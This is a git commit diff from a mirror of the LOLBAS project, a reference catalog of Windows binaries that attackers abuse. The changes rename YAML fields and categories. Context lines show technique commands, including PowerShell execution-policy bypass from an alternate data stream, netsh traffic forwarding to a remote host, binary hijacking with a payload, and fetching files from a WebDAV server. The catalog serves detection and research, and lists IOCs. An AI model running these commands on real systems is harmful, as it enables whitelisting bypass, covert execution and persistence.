mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-25 14:29:24 +01:00
Major changes to Web portal - Small fixes to source files to adjust
This commit is contained in:
parent
2b77add5b4
commit
94368c1e69
@ -7,7 +7,7 @@ Commands:
|
||||
- Command: The command
|
||||
Description: Description of the command
|
||||
Usecase: A description of the usecase
|
||||
Category: Execution
|
||||
Category: Execute
|
||||
Privileges: Required privs
|
||||
MitreID: T1055
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1055
|
||||
@ -15,15 +15,15 @@ Commands:
|
||||
- Command: The second command
|
||||
Description: Description of the second command
|
||||
Usecase: A description of the usecase
|
||||
Category: AWL-Bypass
|
||||
Category: AWL Bypass
|
||||
Privileges: Required privs
|
||||
MitreID: T1033
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1033
|
||||
OperatingSystem: Windows 10 All
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\bin.exe
|
||||
- Path: c:\windows\syswow64\bin.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code: http://url.com/git.txt
|
||||
Detection:
|
||||
- IOC: Event ID 10
|
||||
|
@ -7,10 +7,10 @@ Categories: []
|
||||
Commands:
|
||||
- Command: explorer.exe calc.exe
|
||||
Description: 'Executes calc.exe as a subprocess of explorer.exe.'
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- c:\windows\explorer.exe
|
||||
- c:\windows\sysWOW64\explorer.exe
|
||||
Code Sample: []
|
||||
Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/bohops/status/986984122563391488
|
||||
|
@ -13,10 +13,10 @@ Commands:
|
||||
Description: Load (execute) NetSh.exe helper DLL file.
|
||||
- Command: netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1
|
||||
Description: Forward traffic from the listening address and proxy to a remote system.
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- C:\Windows\System32
|
||||
- C:\Windows\SysWOW64
|
||||
Code Sample: []
|
||||
Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md
|
||||
|
@ -7,9 +7,9 @@ Categories: []
|
||||
Commands:
|
||||
- Command: nltest.exe /SERVER:192.168.1.10 /QUERY
|
||||
Description: ''
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- c:\windows\system32\nltest.exe
|
||||
Code Sample: []
|
||||
Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/sysopfb/status/986799053668139009
|
||||
|
@ -9,10 +9,10 @@ Commands:
|
||||
Description: Opens the target file with the default application.
|
||||
- Command: OpenWith.exe /c C:\testing.msi
|
||||
Description: Opens the target file with the default application.
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- c:\windows\system32\Openwith.exe
|
||||
- c:\windows\sysWOW64\Openwith.exe
|
||||
Code Sample: []
|
||||
Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/harr0ey/status/991670870384021504
|
||||
|
@ -7,10 +7,10 @@ Categories: []
|
||||
Commands:
|
||||
- Command: powershell -ep bypass - < c:\temp:ttt
|
||||
Description: Execute the encoded PowerShell command stored in an Alternate Data Stream (ADS).
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
||||
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
||||
Code Sample: []
|
||||
Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/Moriarty_Meng/status/984380793383370752
|
||||
|
@ -11,10 +11,10 @@ Commands:
|
||||
Description: Capture a maximum of 100 screenshots of the desktop and save them in the target .ZIP file.
|
||||
- Command: psr.exe /stop
|
||||
Description: Stop the Problem Step Recorder.
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- C:\Windows\System32\Psr.exe
|
||||
- C:\Windows\SysWOW64\Psr.exe
|
||||
Code Sample: []
|
||||
Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf
|
||||
|
@ -9,10 +9,10 @@ Commands:
|
||||
Description: Copy the entire contents of the SourceFolder to the DestFolder.
|
||||
- Command: Robocopy.exe \\SERVER\SourceFolder C:\DestFolder
|
||||
Description: Copy the entire contents of the SourceFolder to the DestFolder.
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- c:\windows\system32\binary.exe
|
||||
- c:\windows\sysWOW64\binary.exe
|
||||
Code Sample: []
|
||||
Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://social.technet.microsoft.com/wiki/contents/articles/1073.robocopy-and-a-few-examples.aspx
|
||||
|
@ -7,9 +7,9 @@ Categories: []
|
||||
Commands:
|
||||
- Command: Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary
|
||||
Description: Hijack RdrCEF.exe with a payload executable to launch when opening Adobe
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\
|
||||
Code Sample: []
|
||||
Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/pabraeken/status/997997818362155008
|
||||
|
@ -7,9 +7,9 @@ Categories: []
|
||||
Commands:
|
||||
- Command: Gpup.exe -w whatever -e c:\Windows\System32\calc.exe
|
||||
Description: Execute another command through gpup.exe (Notepad++ binary).
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- 'C:\Program Files (x86)\Notepad++\updater\gpup.exe '
|
||||
Code Sample: []
|
||||
Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/pabraeken/status/997892519827558400
|
||||
|
@ -7,9 +7,9 @@ Categories: []
|
||||
Commands:
|
||||
- Command: NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
|
||||
Description: Run PowerShell via LotusNotes.
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- C:\Program Files (x86)\IBM\Lotus\Notes\Notes.exe
|
||||
Code Sample: []
|
||||
Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
|
||||
|
@ -7,9 +7,9 @@ Categories: []
|
||||
Commands:
|
||||
- Command: Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
|
||||
Description: Run PowerShell via LotusNotes.
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- C:\Program Files (x86)\IBM\Lotus\Notes\notes.exe
|
||||
Code Sample: []
|
||||
Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
|
||||
|
@ -17,9 +17,9 @@ Commands:
|
||||
Description: Kill a process.
|
||||
- Command: Nvudisp.exe Run foo
|
||||
Description: Run process
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- C:\windows\system32\nvuDisp.exe
|
||||
Code Sample: []
|
||||
Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- http://sysadminconcombre.blogspot.ca/2018/04/run-system-commands-through-nvidia.html
|
||||
|
@ -17,9 +17,9 @@ Commands:
|
||||
Description: Kill a process.
|
||||
- Command: nvuhda6.exe Run foo
|
||||
Description: Run process
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Missing
|
||||
Code Sample: []
|
||||
Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/
|
||||
|
@ -7,9 +7,9 @@ Categories: []
|
||||
Commands:
|
||||
- Command: Replace ROCCAT_Swarm_Monitor.exe with your binary.exe
|
||||
Description: Hijack ROCCAT_Swarm_Monitor.exe and launch payload when executing ROCCAT_Swarm.exe
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- C:\Program Files (x86)\ROCCAT\ROCCAT Swarm\
|
||||
Code Sample: []
|
||||
Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/pabraeken/status/994213164484001793
|
||||
|
@ -7,9 +7,9 @@ Categories: []
|
||||
Commands:
|
||||
- Command: Run Setup.exe
|
||||
Description: Hijack hpbcsiServiceMarshaller.exe and run Setup.exe to launch a payload.
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- C:\LJ-Ent-700-color-MFP-M775-Full-Solution-15315
|
||||
Code Sample: []
|
||||
Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/pabraeken/status/994381620588236800
|
||||
|
@ -7,9 +7,9 @@ Categories: []
|
||||
Commands:
|
||||
- Command: Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf"
|
||||
Description: Execute calc.exe through DefaultInstall Section Directive in INF file.
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- C:\Program Files (x86)\Citrix\ICA Client\Drivers64\Usbinst.exe
|
||||
Code Sample: []
|
||||
Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/pabraeken/status/993514357807108096
|
||||
|
@ -7,9 +7,9 @@ Categories: []
|
||||
Commands:
|
||||
- Command: VBoxDrvInst.exe driver executeinf c:\temp\calc.inf
|
||||
Description: Set registry key-value for persistance via INF file call through VBoxDrvInst.exe
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- C:\Program Files\Oracle\VirtualBox Guest Additions
|
||||
Code Sample: []
|
||||
Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/pabraeken/status/993497996179492864
|
||||
|
@ -12,9 +12,9 @@ Commands:
|
||||
MitreID: T1218
|
||||
MItreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
@ -18,9 +18,9 @@ Commands:
|
||||
MitreID: T1064
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1064
|
||||
OperatingSystem: Windows
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- c:\python27amd64\Lib\site-packages\win32com\test\testxslt.js (Visual Studio Installation)
|
||||
Code Sample: []
|
||||
Code_Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/bohops/status/993314069116485632
|
||||
|
@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Atbroker.exe
|
||||
- Path: C:\Windows\SysWOW64\Atbroker.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration
|
||||
|
@ -20,10 +20,10 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\bash.exe
|
||||
- Path: C:\Windows\SysWOW64\bash.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Child process from bash.exe
|
||||
|
@ -36,10 +36,10 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\bitsadmin.exe
|
||||
- Path: C:\Windows\SysWOW64\bitsadmin.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Child process from bitsadmin.exe
|
||||
|
@ -36,10 +36,10 @@ Commands:
|
||||
MitreID: T1140
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1140
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\certutil.exe
|
||||
- Path: C:\Windows\SysWOW64\certutil.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Certutil.exe creating new files on disk
|
||||
|
@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1078
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1078
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\cmdkey.exe
|
||||
- Path: C:\Windows\SysWOW64\cmdkey.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Usage of this command could be an IOC
|
||||
|
@ -20,10 +20,10 @@ Commands:
|
||||
MitreID: T1191
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1191
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\cmstp.exe
|
||||
- Path: C:\Windows\SysWOW64\cmstp.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Execution of cmstp.exe should not be normal unless VPN is in use
|
||||
|
@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1196
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1196
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\control.exe
|
||||
- Path: C:\Windows\SysWOW64\control.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Control.exe executing files from alternate data streams.
|
||||
|
@ -20,10 +20,10 @@ Commands:
|
||||
MitreID: T1127
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Csc.exe should normally not run a system unless it is used for development.
|
||||
|
@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\cscript.exe
|
||||
- Path: C:\Windows\SysWOW64\cscript.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Cscript.exe executing files from alternate data streams
|
||||
|
@ -12,12 +12,12 @@ Commands:
|
||||
MitreID: T1127
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
@ -20,10 +20,10 @@ Commands:
|
||||
MitreID: T1003
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1003
|
||||
OperatingSystem: Windows server
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\diskshadow.exe
|
||||
- Path: C:\Windows\SysWOW64\diskshadow.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Child process from diskshadow.exe
|
||||
|
@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1035
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1035
|
||||
OperatingSystem: Windows server
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Dnscmd.exe
|
||||
- Path: C:\Windows\SysWOW64\Dnscmd.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Dnscmd.exe loading dll from UNC path
|
||||
|
@ -44,10 +44,10 @@ Commands:
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\esentutl.exe
|
||||
- Path: C:\Windows\SysWOW64\esentutl.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
@ -28,10 +28,10 @@ Commands:
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Expand.exe
|
||||
- Path: C:\Windows\SysWOW64\Expand.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\Internet Explorer\Extexport.exe
|
||||
- Path: C:\Program Files\Internet Explorer(x86)\Extexport.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Extexport.exe loads dll and is execute from other folder the original path
|
||||
|
@ -28,10 +28,10 @@ Commands:
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\extrac32.exe
|
||||
- Path: C:\Windows\SysWOW64\extrac32.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
@ -36,10 +36,10 @@ Commands:
|
||||
MitreID: T1185
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1185
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\findstr.exe
|
||||
- Path: C:\Windows\SysWOW64\findstr.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: finstr.exe should normally not be invoked on a client system
|
||||
|
@ -20,10 +20,10 @@ Commands:
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\forfiles.exe
|
||||
- Path: C:\Windows\SysWOW64\forfiles.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
@ -20,10 +20,10 @@ Commands:
|
||||
MitreID: T1216
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\gpscript.exe
|
||||
- Path: C:\Windows\SysWOW64\gpscript.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Scripts added in local group policy
|
||||
|
@ -20,10 +20,10 @@ Commands:
|
||||
MitreID: T1216
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1216
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\hh.exe
|
||||
- Path: C:\Windows\SysWOW64\hh.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: hh.exe should normally not be in use on a normal workstation
|
||||
|
@ -12,12 +12,12 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\ie4unit.exe
|
||||
- Path: c:\windows\sysWOW64\ie4unit.exe
|
||||
- Path: c:\windows\system32\ieuinit.inf
|
||||
- Path: c:\windows\sysWOW64\ieuinit.inf
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: ie4unit.exe loading a inf file from outside %windir%
|
||||
|
@ -20,10 +20,10 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Infdefaultinstall.exe
|
||||
- Path: C:\Windows\SysWOW64\Infdefaultinstall.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
|
||||
Detection:
|
||||
- IOC:
|
||||
|
@ -20,12 +20,12 @@ Commands:
|
||||
MitreID: T1118
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1118
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
@ -15,7 +15,7 @@ Commands:
|
||||
- Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab
|
||||
Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
|
||||
Usecase: Hide data compressed into an alternate data stream
|
||||
Category: Alternate data streams
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
@ -28,10 +28,10 @@ Commands:
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\makecab.exe
|
||||
- Path: C:\Windows\SysWOW64\makecab.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Makecab getting files from Internet
|
||||
|
@ -20,10 +20,10 @@ Commands:
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\mavinject.exe
|
||||
- Path: C:\Windows\SysWOW64\mavinject.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: mavinject.exe should not run unless APP-v is in use on the workstation
|
||||
|
@ -7,7 +7,7 @@ Commands:
|
||||
- Command: Microsoft.Worflow.Compiler.exe tests.xml results.xml
|
||||
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.xml file.
|
||||
Usecase: Compile and run code
|
||||
Category: Execution
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
||||
@ -28,9 +28,9 @@ Commands:
|
||||
MitreID: T1127
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
||||
OperatingSystem: Windows 10S
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Microsoft.Workflow.Compiler.exe would not normally be run on workstations.
|
||||
|
@ -12,10 +12,10 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows 10 (and possibly earlier versions)
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\mmc.exe
|
||||
- Path: C:\Windows\SysWOW64\mmc.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
@ -20,14 +20,14 @@ Commands:
|
||||
MitreID: T1127
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Msbuild.exe should not normally be executed on workstations
|
||||
|
@ -12,9 +12,9 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\msconfig.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/mscfgtlc.xml
|
||||
Detection:
|
||||
- IOC: mscfgtlc.xml changes in system32 folder
|
||||
|
@ -20,10 +20,10 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Msdt.exe
|
||||
- Path: C:\Windows\SysWOW64\Msdt.exe
|
||||
Code Sample:
|
||||
Code_Sample:
|
||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/PCW8E57.xml
|
||||
Detection:
|
||||
- IOC:
|
||||
|
@ -36,10 +36,10 @@ Commands:
|
||||
MitreID: T1170
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1170
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
